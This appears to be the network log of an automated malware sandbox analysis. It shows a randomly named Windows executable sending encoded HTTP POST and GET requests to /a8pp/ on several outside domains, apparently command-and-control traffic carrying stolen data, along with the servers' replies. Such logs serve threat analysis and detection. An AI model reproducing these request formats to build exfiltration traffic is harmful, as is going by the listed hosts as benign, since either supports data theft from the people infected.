                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.11.3049825217.70.184.50807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:30.569041014 CEST1700OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 54 44 73 45 59 46 63 46 31 4b 32 62 4b 37 30 72 39 6a 41 41 4d 32 44 56 35 34 61 79 4a 2b 77 55 5a 65 38 6f 2f 4f 34 51 39 72 51 63 45 7a 7a 6f 6a 46 39 6e 37 32 39 32 48 41 59 2f 48 70 70 54 78 76 4f 52 50 2b 77 2b 52 2f 67 43 70 2f 63 4c 6d 50 75 6a 71 53 53 63 71 34 70 78 50 38 55 6f 49 62 36 75 38 34 74 56 32 58 79 43 46 6c 76 71 72 34 7a 51 34 37 56 31 39 71 55 2f 4c 4c 75 2b 66 66 44 34 4f 73 73 6b 50 67 78 56 32 59 55 6d 30 65 55 58 46 64 45 6d 41 67 78 7a 43 50 47 45 57 45 66 78 77 69 67 32 78 59 70 65 47 41 4d 34 79 46 52 65 4f 68 74 69 2f 69 78 70 51 66 31 73 70 36 65 42 56 79 69 36 44 5a 78 70 54 77 54 65 77 76 59 56 34 79 31 59 67 61 61 6b 66 45 7a 2f 45 44 64 68 58 38 6c 35 58 38 78 62 39 61 2f 66 52 54 6d 35 7a 30 78 65 49 35 50 43 4a 36 50 46 53 38 6a 7a 36 4a 47 46 68 4d 75 68 52 71 50 34 6e 7a 33 47 5a 66 77 76 6e 44 66 51 36 44 76 50 6f 66 6f 33 5a 34 4e 4e 4a 54 6f 56 49 70 74 49 31 51 4b 4a 49 2f 73 62 41 55 53 37 4d [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGTDsEYFcF1K2bK70r9jAAM2DV54ayJ+wUZe8o/O4Q9rQcEzzojF9n7292HAY/HppTxvORP+w+R/gCp/cLmPujqSScq4pxP8UoIb6u84tV2XyCFlvqr4zQ47V19qU/LLu+ffD4OsskPgxV2YUm0eUXFdEmAgxzCPGEWEfxwig2xYpeGAM4yFReOhti/ixpQf1sp6eBVyi6DZxpTwTewvYV4y1YgaakfEz/EDdhX8l5X8xb9a/fRTm5z0xeI5PCJ6PFS8jz6JGFhMuhRqP4nz3GZfwvnDfQ6DvPofo3Z4NNJToVIptI1QKJI/sbAUS7MArae9+nej7t8IkLLtU1vNowwlJqOrJ2KprFBzXDL5yNJiOzodI5KD+s1zJXjMwRenMjqANvWw9hi0FQd2WiYosgUu+2912C4o8MP3F7lrE4z1EaOCoyffL3Hp/pg20WzKiSCtkiKuGbBeHEw9hJPmaC3i245wY5pUHYUEYqbmtN/VH9IW4fgO4evZ5TavMxkWlgcKPS9IO+KQsOE3EpamiHuyiWJX9tTy+K4CSDd9StuMUVDkWx+5v3LvcLzCocOF+PkSU+/ftapLYFudEGUemZUQPiu5YiLuJ7dnFtUUeycailFlUmleB6YG5RxB/knFiWy9KNJXEX8dvote/x28Pw+NYEGkVkEph0U3KtpUnvwPoPl/PO2GTQcVwzxamyIS/3VQ8QYwo5L+dM+l33rq2XnAXpbI95dxHccDWeIfqU4X2XUP037AHraqxUHKUnV9nK8bVADbAfA3uVscFrQf8ySJWzMF60Nh7aGjPgsXEdBlqBZ8ZWVfYI+stJDYgRLzBmJy5i/Y1h3q0yMaVIBrRKWbjMDu/rEMyzJYguJNO3enR1kVVHCwZiXetqbyvetqgX7fQPU2SqzIU2FT6exUXSkiwGNw6+xuYpMBRNN0IRLAkfm8Ejin24tcRrPgkEf3dTRX18GfTyH3XbZhcdMruPJVIrjZ/4si4 [TRUNCATED]
                                        Jun 4, 2024 14:36:30.780107975 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:30 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.11.3049826217.70.184.50807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:33.301645994 CEST476OUTGET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:33.514297009 CEST1289INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:33 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Raw: 37 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 [TRUNCATED]
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:36:33.514312983 CEST886INData Raw: 72 65 73 75 6c 74 73 20 6f 66 20 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:36:33.514328957 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.11.304982791.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:55.351156950 CEST742OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 46 4e 34 54 41 6b 6a 75 41 5a 42 49 46 76 4c 53 6b 34 31 2b 6f 4d 6b 4f 68 77 79 53 79 50 6b 61 78 58 6c 72 30 6b 32 59 35 52 7a 48 44 45 79 56 74 48 37 33 67 57 33 46 58 2b 6a 73 4b 54 35 46 59 6e 2b 50 42 72 57 5a 33 4a 6d 58 2b 65 66 7a 62 33 4e 79 42 48 45 69 43 6d 42 74 61 76 4b 53 71 34 66 67 69 48 46 62 58 4c 63 54 78 76 45 5a 71 79 38 35 35 4e 7a 78 36 41 46 4d 4e 69 2b 4d 38 50 6d 72 67 55 39 66 4b 7a 36 37 52 6b 4e 5a 34 77 52 57 5a 42 58 73 51 30 76 6e 36 39 6b 45 4c 74 55 53 38 37 68 35 42 69 46 35 68 45 48 77 47 4b 47 49 6d 4f 33 68 53 5a 76 65 66 59 58 51 4e 67 3d 3d
                                        Data Ascii: 2NlhHLS8=FN4TAkjuAZBIFvLSk41+oMkOhwySyPkaxXlr0k2Y5RzHDEyVtH73gW3FX+jsKT5FYn+PBrWZ3JmX+efzb3NyBHEiCmBtavKSq4fgiHFbXLcTxvEZqy855Nzx6AFMNi+M8PmrgU9fKz67RkNZ4wRWZBXsQ0vn69kELtUS87h5BiF5hEHwGKGImO3hSZvefYXQNg==
                                        Jun 4, 2024 14:36:55.577474117 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.11.304982891.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:58.111376047 CEST762OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 46 4e 34 54 41 6b 6a 75 41 5a 42 49 55 2f 62 53 6f 2b 39 2b 70 73 6b 4a 73 67 79 53 6b 2f 6b 65 78 58 70 72 30 68 4f 49 35 6a 48 48 44 6c 43 56 75 47 37 33 74 32 33 46 44 75 6a 77 45 7a 35 77 59 6e 36 48 42 76 57 5a 33 4a 69 58 2b 65 76 7a 62 45 56 7a 41 58 45 67 62 32 42 76 48 2f 4b 53 71 34 66 67 69 44 6b 47 58 4c 45 54 78 63 63 5a 72 54 38 6d 30 74 7a 77 39 41 46 4d 4a 69 2b 79 38 50 6e 49 67 56 77 45 4b 31 6d 37 52 67 4a 5a 34 69 31 5a 51 42 57 47 50 45 75 74 79 63 42 56 45 65 41 31 78 6f 55 68 46 52 42 68 6b 54 32 71 62 4a 79 4b 31 75 4c 4d 4f 59 43 32 64 61 57 4c 51 6f 30 2b 70 6e 77 55 6f 6d 58 42 71 6e 77 66 57 52 48 50 45 57 30 3d
                                        Data Ascii: 2NlhHLS8=FN4TAkjuAZBIU/bSo+9+pskJsgySk/kexXpr0hOI5jHHDlCVuG73t23FDujwEz5wYn6HBvWZ3JiX+evzbEVzAXEgb2BvH/KSq4fgiDkGXLETxccZrT8m0tzw9AFMJi+y8PnIgVwEK1m7RgJZ4i1ZQBWGPEutycBVEeA1xoUhFRBhkT2qbJyK1uLMOYC2daWLQo0+pnwUomXBqnwfWRHPEW0=
                                        Jun 4, 2024 14:36:58.336939096 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.11.304982991.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:00.859553099 CEST1679OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 46 4e 34 54 41 6b 6a 75 41 5a 42 49 55 2f 62 53 6f 2b 39 2b 70 73 6b 4a 73 67 79 53 6b 2f 6b 65 78 58 70 72 30 68 4f 49 35 6a 2f 48 44 58 4b 56 73 6c 54 33 73 32 33 46 41 75 6a 67 45 7a 35 70 59 6a 75 44 42 76 53 6e 33 4c 71 58 38 2f 50 7a 64 78 35 7a 5a 48 45 67 47 6d 42 69 61 76 4b 4c 71 34 50 6b 69 48 41 47 58 4c 45 54 78 65 6f 5a 72 43 38 6d 32 74 7a 78 36 41 46 59 4e 69 2b 4a 38 4f 4f 7a 67 56 30 55 4b 47 2b 37 52 45 74 5a 39 52 52 5a 66 42 58 67 4d 45 76 34 79 63 38 4e 45 65 4d 35 78 70 78 45 46 53 68 68 6c 32 62 54 4a 74 32 65 6f 4d 33 65 4b 70 6d 68 65 4d 57 55 52 49 67 49 70 55 56 76 68 31 72 64 7a 42 45 70 4c 67 72 48 57 7a 72 4e 31 2f 63 6f 35 4f 36 6b 70 52 77 74 59 68 47 54 4f 41 68 65 7a 57 69 36 52 57 62 57 54 6f 53 4c 34 73 6c 38 77 6e 49 51 64 62 61 65 50 41 54 65 4b 73 4b 76 78 41 4a 4a 41 39 45 2b 6d 6b 67 68 77 79 31 6d 74 59 4f 65 71 33 52 43 2f 7a 71 70 4f 32 32 52 72 71 6e 48 47 2f 2b 75 41 69 54 34 49 71 41 44 39 7a 47 6c 2f 67 30 6a 44 6a 6d 6f 36 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=FN4TAkjuAZBIU/bSo+9+pskJsgySk/kexXpr0hOI5j/HDXKVslT3s23FAujgEz5pYjuDBvSn3LqX8/Pzdx5zZHEgGmBiavKLq4PkiHAGXLETxeoZrC8m2tzx6AFYNi+J8OOzgV0UKG+7REtZ9RRZfBXgMEv4yc8NEeM5xpxEFShhl2bTJt2eoM3eKpmheMWURIgIpUVvh1rdzBEpLgrHWzrN1/co5O6kpRwtYhGTOAhezWi6RWbWToSL4sl8wnIQdbaePATeKsKvxAJJA9E+mkghwy1mtYOeq3RC/zqpO22RrqnHG/+uAiT4IqAD9zGl/g0jDjmo6URne/1+3t61Gg0+yqabD9eRGQ6bV6uUTp+WITETGCpAzgrKjVOqFqtSOIEa0Sy/W4cILeMDH8rQXTf11Zmc779Il3yU5aycgs0TtiyQ1hSQJSqjTD5yl2tTjCd33jFhoAkSNRneXr51GVlp28hDf/pVwy2HVNxLCjtmpInwNKMDMJV5KfXaO6bmt7EfOFpIaLdvlZeC3YwLvH9LpBJqoAunncoDXSwSEa3AVRYDnFYX9KZopnl8r4UtCq4z9vlg6SLqR+4cyuISyA18NleIgLT71iBtRxTrkArF0G7aqYf5g6aRhMOyOqAgcstnyiU9DEMSo7ZghVFtnSR3qu5udRcLdspsjXTfw0Jt9YDAxIkEcI/7vQBpIrx5Yh4gyHfWoeDy6DdaLQ31qnnFbhlCG3tc0bQ+nJKYJ75zI0Nxo4vrUnEs0FDHL6HNbrPqPfew0Fonhnkj3sBxvzm1RyvM3dkwLsZ+5rVPxS2GCWbaXrJuW64JP3uaLfEHZIrUqCcn9eF63X6pHwXs1ELrIQigpUsX6pbATIwj9XIFN1MolenfQwCrgUV2YICNl8zNIUEnRz3qomxUMOsWXvgV0DDGWp9cpQ4ioRrTSDCZwVMYChwpa2fnvfSr0z8vIVOdcFXWy4hli+UzjX8Nc4i0fb3NnBGbRIwAllkhBx7 [TRUNCATED]
                                        Jun 4, 2024 14:37:01.084100962 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.11.304983091.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:03.609122992 CEST469OUTGET /a8pp/?2NlhHLS8=IPQzDRTPddNuZ/HMr4F9le4A0likp4cPjTBZoWar0DW2Dke1nHX7p3PJPbmWMxtVZQ2vG/Syy6/u7vfLcEQjJE0ZPWoRIvOz07zRtU0HA7dN58xUlB4x570=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:03.833791018 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.11.304983123.82.12.29807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:09.453222036 CEST766OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6a 30 47 42 42 72 7a 75 49 35 63 67 36 64 45 2b 4a 4e 41 55 68 48 73 4f 6c 62 68 67 5a 69 67 37 4e 71 4d 4a 49 45 65 54 38 34 30 47 30 76 41 42 4c 48 30 58 76 37 59 6c 42 68 4f 6a 4f 45 71 34 7a 53 39 6c 6b 58 42 5a 45 70 6b 55 50 77 35 6b 61 59 46 4b 42 65 35 43 78 30 34 5a 4b 47 72 72 45 55 6d 50 70 32 57 4c 69 69 36 58 30 72 6b 4a 31 39 6b 70 6c 56 38 75 39 57 55 6e 72 6b 51 39 70 39 35 4c 39 51 61 2b 33 66 74 30 44 70 79 63 64 6b 4e 6d 72 74 6b 63 77 43 4f 33 30 70 2b 43 69 78 78 56 59 50 31 33 45 43 2f 61 65 34 38 59 68 6d 43 4c 6a 2f 43 5a 77 73 4f 7a 61 32 33 5a 6b 67 3d 3d
                                        Data Ascii: 2NlhHLS8=j0GBBrzuI5cg6dE+JNAUhHsOlbhgZig7NqMJIEeT840G0vABLH0Xv7YlBhOjOEq4zS9lkXBZEpkUPw5kaYFKBe5Cx04ZKGrrEUmPp2WLii6X0rkJ19kplV8u9WUnrkQ9p95L9Qa+3ft0DpycdkNmrtkcwCO30p+CixxVYP13EC/ae48YhmCLj/CZwsOza23Zkg==
                                        Jun 4, 2024 14:37:09.588268995 CEST376INHTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:08 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
